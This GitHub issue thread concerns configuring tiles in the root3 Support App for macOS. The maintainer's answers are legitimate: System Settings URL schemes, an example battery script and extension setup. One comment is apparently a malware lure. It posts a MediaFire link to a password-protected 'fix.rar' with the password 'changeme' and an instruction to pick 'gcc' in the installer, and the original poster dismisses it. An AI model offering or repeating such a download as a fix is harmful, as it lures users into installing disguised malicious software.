### ISSUE TITLE
Need 2 Tiles to work within root3:Support App 

### ISSUE THREAD

**Issue by mrrobertbuss** [root3nl/SupportApp#192]
Hello everyone: Can someone send me the configuration for the Battery to show it's percentage within a Tile?
Also, can someone send me the configuration for Privacy & Security to open within a Tile?  root3 support has suggested Battery is built in with the Info Items 1 though 4 and that is not true in my case. Screenshot. Instead I am using First Row Left for the Battery and First Row Right for Privacy & Security. screenshots. 

I am stuck how to make these work and would appreciate any scripts to make this work. 

![Screenshot 2024-08-26 at 9 31 59 AM](https://github.com/user-attachments/assets/a231ef1d-17d4-4af2-abb4-1527343820b8)
![Screenshot 2024-08-26 at 9 42 25 AM](https://github.com/user-attachments/assets/9b6cff61-0f72-42c8-a28b-16e1a85251c3)

![Screenshot 2024-08-26 at 9 38 48 AM](https://github.com/user-attachments/assets/9e5f91bb-fcf7-4156-8874-031f6c4cd91b)

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrrobertbuss** [comment]
> https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file

This is not helpful at all.

**Comment by jordywitteman** [comment]
Hi @mrrobertbuss! The Battery level is definitely not built-in and needs custom scripting and the use of a Support App Extension. Out of curiosity, why would you want to show the battery percentage as you can also see this in the macOS menu bar? We do have an example script to show the battery condition which might me more relevant to hint users there's something wrong with the battery and needs service or a replacement: https://github.com/root3nl/SupportApp/blob/master/Extension%20Sample%20Scripts/battery_condition.zsh

If you want to open the Privacy and Security pane in System Settings (macOS 13 and higher), I think you should be able to use this link with URL as type: `x-apple.systempreferences:com.apple.settings.PrivacySecurity`

Hope it helps!

**Comment by mrrobertbuss** [comment]
Hello -

The Privacy & Security link worked perfectly, thank you very much!

The battery link on the dashboard doesn't work that I copied from your link. I get the error messgae. Screenshot

  1.
Was I supposed to copy the entire code from that example, correct or just copy and paste the part that states "Do not Edit below this Line." I've tried both ways and the error pos up. Screenshot.
  2.
Since Privacy & Security command worked so well, I thought I would modify it and try this: x-apple.systempreferences:com.apple.settings.Battery
     *
It does open System Settings, but it lands on "Appearance" and not the battery. Screenshot.

Any help is greatly appreciated. I'm so close to having this work like we want it. Screenshot

Robert Buss
Service Desk Engineer
T: 714.202.6987

________________________________

**Comment by jordywitteman** [comment]
@mrrobertbuss I don't see the screenshot included in your response. What does it say? The script is an example and can be modified in any way you'd like. The example uses Extension B and you will have to deploy the whole script locally (with proper permissions) and point the extension link to the path of the script and make sure the link type is set to `PrivilegedScript`. Please ignore "Do not Edit below this Line." as this is our internal script template.

Opening the battery pane should work with `x-apple.systempreferences:com.apple.Battery-Settings.extension`. There are some great resources which documented all the options such as: https://github.com/bvanpeski/SystemPreferences/blob/main/macos_preferencepanes-Ventura.md

**Comment by mrrobertbuss** [comment]
Hello,

All Tiles now work thanks to you! Really appreciate the time you took to get this to work correctly.

Robert Buss
Service Desk Engineer
T: 714.202.6987
________________________________

**Comment by mrrobertbuss** [comment]
I'm back with questions. The app works great BTW.


  1.  I'm not sure what the "Automatically Support (non-PKG at log in is for. I went through the documentation link but did not see a reference as to what this can do if enabled? [cid:b8765411-842d-496a-93ff-5d7913fa2af3]


  1.
Whenever I reboot, I get the message "Your password will expire in xx number of days. Change password or continue?" I think this is a great feature but would like to trim this down to show only when 10 days are left before the password expires. I'm still 25 days out and it's asking if I want to change the password which is too soon. How do I change that to start showing at 10 days?


  1.  I have scoped out 6 MacBook's for this app to install. Only 2/6 actually get the icon in the Menu Bar even though JAMF states "Completed" but there is nothing there. Am I missing a trigger somewhere? Is this something JAMF should figure out with me?

Have a great weekend and reply when you can. I have demonstrated this app to the Executive and Security Team and they really loved it. This will help keep our company that much more secure by providing useful info to the end user.


Robert Buss
Service Desk Engineer
714.202.6987
________________________________

**Comment by jordywitteman** [comment]
Closing this issue as this is more a support question and can is better handled in the community.
